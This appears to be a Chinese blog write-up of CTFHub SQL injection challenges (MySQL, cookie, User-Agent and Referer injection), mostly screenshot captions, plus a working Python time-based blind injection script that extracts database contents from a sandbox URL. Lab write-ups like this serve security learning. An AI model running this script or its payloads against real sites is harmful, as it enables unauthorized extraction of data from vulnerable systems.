Loading

CTFHub_技能树_SQL注入Ⅱ

SQL注入

MySQL结构

进行尝试:

ctfhub_mysql_0

ctfhub_mysql_1

尝试查看表名:

ctfhub_mysql_2

尝试查看列名:

ctfhub_mysql_3

发现无法直接输出:

ctfhub_mysql_4

使用时间注入脚本跑出结果:

ctfhub_mysql_5

import requests
import time

session = requests.session()
url = "http://challenge-8275a6b068ee702f.sandbox.ctfhub.com:10080/"
table = ""

list_1 = [element for element in range(48,58)]
list_2 = [element for element in range(97,126)]
list_0 = list_1 + list_2

for i in range(1, 50):
    print(i)
    for j in list_0:
        # payload = "1 and if(substr(database(),%d,1) ='%s',sleep(1),1)"%(i, chr(j))
        payload = "1 and if(substr((select ljvpqlbwbt from jwlaqmygfp),%d,1) = '%s',sleep(1),1)"%(i, chr(j))
        start_time = time.time()
        str_get = session.get(url=url + '?id=' + payload).text
        end_time = time.time()
        t = end_time - start_time
        if t > 1:
            table += chr(j)
            print(table)
            break

Cookie注入

使用Burp suite进行Cookie注入测试:

ctfhub_cookie_1

ctfhub_cookie_2

ctfhub_cookie_3

UA注入

使用Burp suite测试User-Agent注入:

ctfhub_ua_0

查看表名:

ctfhub_ua_1

查看列名:

ctfhub_ua_2

查看flag:

ctfhub_ua_3

Refer注入

使用Burp suite测试Referer注入:

ctfhub_refer_1

查看表名:

ctfhub_refer_2

查看列名:

ctfhub_refer_3

查看flag:

ctfhub_refer_4

posted @ 2020-03-21 15:55  chalan630  阅读(378)  评论(0编辑  收藏  举报